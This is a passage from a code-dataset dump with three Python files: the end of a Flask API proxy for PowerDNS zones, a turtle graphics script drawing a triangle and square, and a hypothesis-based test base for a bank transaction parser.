helper.forward_request()\n return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/servers//zones', methods=['POST'])\n@apikey_auth\ndef api_create_zone(server_id):\n resp = helper.forward_request()\n\n if resp.status_code == 201:\n logging.debug(\"Request to powerdns API successful\")\n data = request.get_json(force=True)\n\n history = History(\n msg='Add domain {0}'.format(data['name'].rstrip('.')),\n detail=json.dumps(data),\n created_by=g.apikey.description\n )\n history.add()\n\n if g.apikey.role.name not in ['Administrator', 'Operator']:\n logging.debug(\"Apikey is user key, assigning created domain\")\n domain = Domain(name=data['name'].rstrip('.'))\n g.apikey.domains.append(domain)\n\n domain = Domain()\n domain.update()\n\n return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/servers//zones', methods=['GET'])\n@apikey_auth\ndef api_get_zones(server_id):\n if g.apikey.role.name not in ['Administrator', 'Operator']:\n domain_obj_list = g.apikey.domains\n else:\n domain_obj_list = Domain.query.all()\n return json.dumps(domain_schema.dump(domain_obj_list)), 200\n\n#endpoint to snychronize Domains in background\n@csrf.exempt\n@api_blueprint.route('/sync_domains', methods=['GET'])\n@apikey_auth\ndef sync_domains():\n domain = Domain()\n domain.update()\n return 'Finished synchronization in background', 200\n","sub_path":"app/blueprints/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":16566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"587154165","text":"import turtle\n\ntriangleLength = 300\ntriangleAngle = 120\nsquareLength = 300\nsquareAngle = 90\nsquareColor = 'red'\ntriangleColor = 'green'\nbgColor = 'blue'\n\n\n\nturtle.bgcolor(bgColor)\n\n#build a yellow triangle\nturtle.penup()\nturtle.goto(-150,100)\nturtle.fillcolor(triangleColor)\nturtle.begin_fill()\nturtle.pendown()\n\nfor i in range(3):\n turtle.forward(triangleLength)\n turtle.left(triangleAngle)\n\nturtle.end_fill()\n\n#build a square\nturtle.penup()\nturtle.fillcolor(squareColor)\nturtle.begin_fill()\nturtle.pendown()\n\nturtle.left(270)\nfor x in range(4):\n turtle.forward(squareLength)\n turtle.left(squareAngle)\n\nturtle.end_fill()\n\nturtle.exitonclick()","sub_path":"turtleTriangle.py","file_name":"turtleTriangle.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194944108","text":"# -*- coding:utf-8 -*-\nfrom datetime import date\n\nimport pytest\nfrom hypothesis import given\nfrom hypothesis.strategies import dates, one_of, decimals, integers, just\n\nfrom bank_merge.common import TransactionType\n\n\nclass BaseTest:\n\n def _prepare_row(self, transaction_time, transaction_type, amount, from_account, to_account):\n raise NotImplementedError()\n\n def _get_parser(self):\n raise NotImplementedError()\n\n @given(\n transaction_time=dates(min_value=date(1001, 1, 1), max_value=date(2999, 1, 1)),\n transaction_type=one_of(*[just(variant) for variant in TransactionType]),\n amount=decimals(min_value=0, allow_nan=False, allow_infinity=False),\n from_account=integers(min_value=0),\n to_account=integers(min_value=0),\n )\n def test_parse_row__ok(self, transaction_time, transaction_type, amount, from_account, to_account):\n row = self._prepare_row(transaction_time, transaction_type, amount, from_account, to_account)\n parsed_row = self._get_parser()(row)\n\n assert parsed_row.date == transaction_time\n assert parsed_row.transaction_type == transaction_type\n assert parsed_row.amount == amount\n assert parsed_row.from_account == from_account\n assert parsed_row.to_account == to_account\n\n @pytest.mark.parametrize(\n 'row',\n [\n ['05 October 2011 14:48 UTC', 'remove', '0.99999999999999999961033714813378812947', '7163', '28568'],\n ['Feb 28 1996', 'delete', '0.610440886', '2566321103514746383', '7163'],\n ['Mar 12 7902', 'remove', '5.23x10', '28214', '32'],\n ['Mar 12 7902', 'remove', '0.0047832405', '3sd3', '32'],\n ['Mar 12 7902', 'remove', '0.9999394527', '28214', 'fffa'],\n ]\n )\n def test_parse_row__err(self, row):\n with pytest.raises(Exception):\n self._get_parser()(row)\n","sub_path":"tests/parsers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}